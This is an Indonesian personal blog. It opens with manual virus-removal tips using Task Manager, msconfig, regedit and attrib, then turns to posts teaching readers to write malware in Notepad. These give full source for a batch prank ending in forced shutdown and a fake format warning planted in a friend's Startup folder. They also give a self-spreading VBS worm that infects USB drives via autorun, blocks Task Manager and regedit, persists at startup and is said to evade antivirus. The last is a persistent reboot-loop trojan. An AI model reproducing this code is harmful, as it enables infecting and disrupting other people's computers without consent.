~ Selamat Datang Di Blogger Kaswar Wijaya Eka Putra ~

Senin, 16 Juni 2014

Membasmi Virus Dengan Command Windows

Jika teman-teman merasakan komputer terkena virus, trojan dan spyware (dalam hal ini kita kategorikan semuanya sebagai virus aja), yang biasanya dengan indikasi ada tampilan yang tidak biasanya pada desktop, program yang digunakan dan browser.Sebaiknya langsung menempuh langkah berikut ini:

1. Tahap Pertama, Matikan Virus di MemoriTekan Ctrl + Alt + Del untuk menampilan Windows Task Manager – Lalu ke bagian “Processes”, terus klik bagian “User Name” untuk mengurutkan file yang diproses pada memori. Setelah itu, lihat ada bagian yang mencurigakan atau tidak. Bila banyak yang di-loading pada memori, sebaiknya dimatikan dahulu startup yang otomatis ter-loading pada bagian bawah kanan (ikon speaker dan jam). Matikan semua ikon-ikon tersebut dengan cara “quit” atau “exit” dari programnya.Loading virus ke memori biasanya berupa EXE file. Langkah ini untuk mencegah virus untuk menyebar terlebih dahulu lewat memori kita. Matikan semua file EXE yang loading di memori kita yang sudah kita urutkan sebelumnya berdasarkan “User Name”. Jangan mematikan file yang kategori “System”, “Local Service”, dan “Network Service”, karena bisa membuat sistem kita Hang atau Freeze.

2. Tahap Kedua, Non-aktifkan Virus di StartupUntuk menon-aktifkan virus supaya tidak terloading ke memori, kita harus membuangnya di startup. Caranya kita bisa menggunakan perintah MSCONFIG,klik menu Start>Run>msconfig – setelah itu akan tampil “System Configuration Utility”. Lalu pilihlah “Startup”, dalam kasus ini sebaiknya netter yang tidak mengerti mana yang loading virus mana yang bukan, sebaiknya pilih “Disable All”. Nantinya netter baru aktifkan kembali startup yang diinginkan kalau virus sudah bersih.Bila netter yang mengerti file yang loading mana file yang diperlukan, dan mana yang tidak, atau mana yang virus atau bukan, sebaiknya menbuang conteng (check box) pada kotak bagian kiri untuk yang dicurigai sebagai virus. Cara ini akan menonaktifkan virus di startup kita.

3. Tahap Ketiga, Hapus File Virus dari KomputerCarilah dengan menggunakan fasilitas “search” pada WIndows, klik menu Start>Search, lalu carilah file EXE virus (contoh: Happy.exe) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari WIndows. Setelah ditemukan, delete atau hapus file tersebut.

4. Tahap Keempat, Hapus Virus dari System RegistryTahap ini adalah tahap terakhir. Kita harus menggunakan perintah REGEDIT untuk mengubah dan men-delete virus dari registry kita. PilihlahStart>Run>regedit – lalu ke menu “Edit” pilihlah “Find” (atau tekan Ctrl+F). Masukkan nama file virus yang ingin kita hapus (contoh: Happy.exe),lalu pilih “Find Next”. Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut (berikut dengan foldernya kalau ada).Kemudian lanjutkan dengan menekan tombol “F3″ atau di menu pilih “Edit” terus “Find Next”. Biasanya file virus diletakkan pada beberapa tempat diregistry. Jadi pastikan netter menghapus semuanya sampai bersih, dalam arti registry komputer bebas dari loading virus tersebut. Karena kalau tidakpekerjaan ini akan sia-sia.

Tips Menghilangkan Virus Secara Manual

Teman-teman dapat melakukan 3 cara alternatif untuk menghilangkan virus yang akan diuraikan seperti berikut ini :

Cara I
Cara yang pertama yang ditawarkan disini adalah menghilangkan trojan melalui notepad file system.ini, langkah-langkahnya adalah :
  1. Klik Start-Run, kemudian ketik system.ini lalu tekan enter
  2. Pada jendela notepad, lihat pada shell=Explorer.exe
  3. Setelah tulisan shell = explorer.exe akan ada file yang bernamaserver.exe
  4. Hilangkan tulisan “server.exe” tersebut maka trojan akan hilang
  5. Setelah itu restart komputer untuk melihat perubahan yang terjadi dan untuk memastikan bahwa komputer anda akan baik-baik saja.
Cara II
Cara berikutnya adalah dengan cara menghapus file server.exe pada MS-DOS dengan perintah delete dan kemudian restart komputer anda, tetapi bila trojan masih belum hilang, maka kita harus masuk pada notepad file win.ini
  1. Klik start-Run kemudian ketik win.ini lalu tekan enter
  2. Pada jendela notepad lihat pada load =
  3. Setelah tulisan load = akan ada file bernama server.exe
  4. Hilangkan tulisan server.exe tersebut, maka trojan akan hilang
  5. Setelah itu restart komputer anda untuk melihat perubahan yang terjadi dan untuk memastikan bahwa komputer anda akan baik-baik saja.
Cara III
Cara yang lain kita masuk registry
  1. Buka registry editor
  2. Masuklah ke HKEY_CLASSES_ROOT\comfile\shell\open\command
  3. Masuklah ke HKEY_CLASSES_ROOT\exefile\shell\open\command
  4. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command
  5. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htafile\Shell\Open\Command
  6. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command
  7. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command
  8. Masuklah ke HKEY_CLASSES_ROOT\comfile\shell\open\command
  9. Masuklah ke HKEY_CLASSES_ROOT\exefile\shell\open\command
  10. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htafile\Shell\Open\Command
  11. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command
  12. Lalu lihat default jika tertulis \”%1\”%* , maka dapat dipastikan sudah terinfeksi trojan
  13. Kemudian ubah default tersebut dengan cara mengklik, setelah melihat menu edit string isi value data dengan “%1”%*.
  14. Setelah edit string telah diubah, maka restart komputer anda hasilnya seratus persen komputer anda akan terbebas dari trojan.

SELAMAT MENCOBA ! :D

CARA MENGHAPUS VIRUS ANGEL2.exe

1. Buka registry editor dan temukan registry key di bawah
HKEY_CURRENT_USER-Software-Microsoft-Windows-CurrentVersion-Run
HKEY_LOCAL_MACHINE-SOFTWARE-Microsoft-Windows-CurrentVersion-Run
Kemudian hapus key “gpmce Angel2.exe”.

2. Kemudian cari virus yang masih tersisa dengan menekan search ".exe" tanpa tanda kutip lihat gambar . dan hapus yg bergambar burung kaka tua:

Truskan dengan membuka START - All programs - Startup - dan hapus angel2.exe
3. Hapus semua file yang berekstensi .exe dengan icon burung kakatua.
4. Selesai.

bagaimana mudahkan..............:)
saya tunggu komentarnya & tunggu yah.......posting terbaru gue

Cara Menghapus Virus Shortcut di Flashdisk


    1. Cara Menghapus virus shortcut - Pasang flashdisk sobat di komputer.
    2. Kemudian buka Command prompt  dengan cara: Klik Start > All Programs > Accessories > Command Prompt.
    3. Jendela Command Prompt akan terbuka.
    4. Nah pada jendela command prompt tersebut pilih nama driveflashdisk anda, misalnya "F:" (tanpa tanda petik) lalu tekan Enter
    5. Selanjutnya ketik perintah berikut ini “attrib –s –h *.* /s /d” (tanpa tanda petik) lalu tekan Enter lagi 

      Cara Menghapus Virus Shortcut di Flashdisk
    6. Maka command prompt akan memprosesnya sekitar 1-2 menit.
    7. Setelah ada pemberitahuan selesai,,sekarang lihat flashdisk dan data anda
    8. Jika Anda tidak ingin rumit untuk menghapus virus shortcut dengan cara ini maka, sobat bisa men-download Software anti virus yang dapat melindungi flashdisk anda dari virus berbahaya. Banyak kok jenis antivirus yang bisa digunakan.  Cara mengatasi virus shortcut di flashdisk

Semoga bermanfaat dan silahkan komentarnnya..... :) 

Selasa, 18 Februari 2014

Cara Membuat Virus Gokil Lewat Notepad

Halo kawan  gmna punya kabar? Yuk ita belajar bikin virus.  .lumayan ampuh lho. . .lucu tapi ya gtu dech. . .agak serem dikit. Juga agak gmana gitu. . . ..

1. baca bismillah dulu...
2. buka notepad nya...
3. trus udah gitu copy kode berikut ke notepad..

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM CATUREKO!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +627840xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA SALAM BUAT BAPAK IBU KAMU YA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “MET NGA'I AJA YA....”

4. nah kalo udah simpen aja dengan nama "virus ganas.bat" 
5. nah kalo mw ngaktifin virusnya tinggal klik file .batnya 2X...
6. tapi sebaiknya ni virus jangan di coba di komputer/laptop milik kita sendiri...ntar malah pusing kita.

inget ya nih virus buat ngerjain temen yang ga kita suka aja(hehe sengaja aku buat kaya gini), o ya ni virus cuma akan merestart komputer temen anda n memberi tulisan2 yang membuat teman anda merasa bahwa ada virus yang ganas di komputernya.....beressss..met mencoba...

BERMAIN DENGAN VIRUS PALSU

 Sesuai dengan judulnya, posting kali ini sifatnya mainan ga ada yang serius. Jangan takut karena judulnya mengandung kata "virus". Tenang aja, yang dibahas tentang virus palsu koq bukan virus beneran. Namanya juga bermain.

Kalo kamu udah siap bermain langsung aja buka notepad di komputer kamu. Setelah itu ketik code di bawah ini.

lol=msgbox ("Virus berbahaya terdeteksi di komputer Anda." &vbcrlf& "Pilih YES untuk memformat harddisk Anda sekarang, atau " &vbcrlf& "NO untuk memformat harddisk setelah restart.",20,"Warning")

Kemudian simpan file tersebut dengan nama gimbal.worm.vbs (nama file bisa dikreasiin sendiri pokoknya extensi file harus .vbs). Untuk mengecek apakah code berjalan apa tidak klik 2 kali file tersebut. Jika berhasil akan mencul seperti gambar berikut di layar komputer kamu.



Tapi tenang.. itu cuma bo'ongan aja, ga akan ada efek apa-apa jika kamu klik YES atau pun NO. Sekarang coba copy-kan file tersebut ke folder C:\Documents and Settings\All Users\Start Menu\Programs\Startup dengan asumsi C:\ adalah drive system windows komputer kamu. Setiap kali masuk Windows (startup) file akan secara otomatis berjalan dengan sendirinya, jadi di desktop akan muncul kotak dialog seperti di atas tanpa diperintah terlebih dahulu. *kalo ga percaya boleh dicoba dulu*

Hmm... gimana yach kalo hal di atas diterapkan di komputer temen tanpa sepengetahuan dia? Kira-kira dia akan panik ga ya? Boleh dicoba tuh buat ngerjain temen..


Minggu, 16 Februari 2014

Cara membuat Virus menyebar ke removable disc

Cara membuat Virus Sederhana dengan notepad
membuat virus sederhana dgn notepad

Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama "YouDieCbrXplr.VBS". Sekarang buka Notepad-nya. Copy kode berikut lalu :

'//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus-//
on error resume next
'//-Dim kata-kata berikut ini-//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,YouDieCbrXplr,nt,check,sd
'//-Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information-//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe YouDieXplr.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'//-Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- YouDieXplr.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- YouDieXplr.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- YouDieXplr.dll.vbs ")
tf.attributes = 39
'//-Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok-//
'Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
'//-Cek Drive-//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\-//
set tf=fs.getfile(flashdrive.path &"\YouDieXplr.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\YouDieXplr.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\YouDieXplr.dll.vbs ")
tf.attributes = 39
'//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)-//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
'//-Manipulasi Registry-//
set YouDieCbrXplr = createobject("WScript.Shell")
'//-Manip - Ubah Title Internet Explorer menjadi THE YOUDIECBRXPLR v.s. ZAY-//
YouDieCbrXplr.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE YOUDIECBRXPLR v.s. ZAY "
'//-Manip - Set agar file hidden tidak ditampilkan di Explorer-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Ad vanced\Hidden", "0″, "REG_DWORD"
'//-Manip - Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No FolderOptions", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa bleRegistryTools", "1″, "REG_DWORD"
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa bleTaskMgr", "1″, "REG_DWORD"
'//-Manip - Disable klik kanan-//
YouDieCbrXplr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No ViewContextMenu", "1″, "REG_DWORD"
'//-Manip - Munculkan Pesan Setiap Windows Startup-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNotic eCaption", "Worm YouDieCbrXplr. Variant from Rangga-Zay, don't panic all data are safe."
'//-Manip - Aktif setiap Windows Startup-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- YouDieXplr.dll.vbs "

//-Manip - Ubah RegisteredOwner dan Organization-//
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
YouDieCbrXplr.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","YouDieCbrXplr"

'//-Nah kalau kode dibawah ini saya nggak tau, tolong di bantu untuk menjelaskan-//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih "All Files (*.*). Simpan dengan nama : YouDieXplr.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he...Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus teman saya ryoutaro kemudian saya kembangkan. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
jangan coba di komputer sendri..


cara membuat virus dengan notepad

cara membuat virus dengan notepad ?? mungkin salah satu sobat bertanya bertanya seperti itu. nah pada kesempatan kali ini saya ingin memberitahukan kepada sobat sobat sekalian tentang bagaimana cara membuat virus trojan dengan notepad. sobat sekalian pernah engga pcnya terserang virus tentunya saja sobat pasti kesel donk.. saya juga pernah mengalaminya sampai sampai pc saya harus di install ulang karena virus telah masuk ke dalam windows system 32 saya.. hehe curhat
langsung aja nii sobat apabila sobat ingin membuat virus dengan notepad adapun langkahlangkah sebagi berikut :


1. buka notepad

2. jika sudah lalu copy lah kode dibawah ini :



rem - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)

createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"

sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub

set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close

set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")

set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem()

function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function

function rebootSystem()
strComputer = "."

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function

3. jika sudah lalu save dengan format .vbs

sebagai contoh saya menyimpan file dengan nama  akuvirus.vbs